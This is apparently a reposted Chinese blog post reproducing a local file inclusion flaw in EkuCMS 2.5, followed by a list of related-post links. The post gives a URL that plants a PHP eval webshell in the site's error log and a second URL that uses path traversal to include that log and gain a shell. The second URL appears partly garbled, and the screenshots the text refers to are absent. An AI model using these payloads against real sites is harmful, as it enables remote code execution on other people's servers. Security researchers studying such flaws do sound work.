zoukankan      html  css  js  c++  java

  • 易酷 cms2.5 本地文件包含漏洞 getshell

    易酷 cms2.5  本地文件包含漏洞 getshell

    首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php)

     安装成功直接进行复现吧

    本地包含一句话木马

    http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

     

    会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

    错误日志内容

    进行包含错误日志,地址:

    http://127.0.0.1/test/ekucms2.5/?s=my/show/id/..	emplogs18_04_18.log

     

    验证下:

    源码链接(链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48)
  • 相关阅读:
    uni_app系列
    并发编程
    VUE+DRF系列
    其实我是个诗人
    中医
    linux+docker
    Mysql数据库
    爱好
    AJAX
    Django
  • 原文地址:https://www.cnblogs.com/Oran9e/p/8873793.html
Copyright © 2011-2022 走看看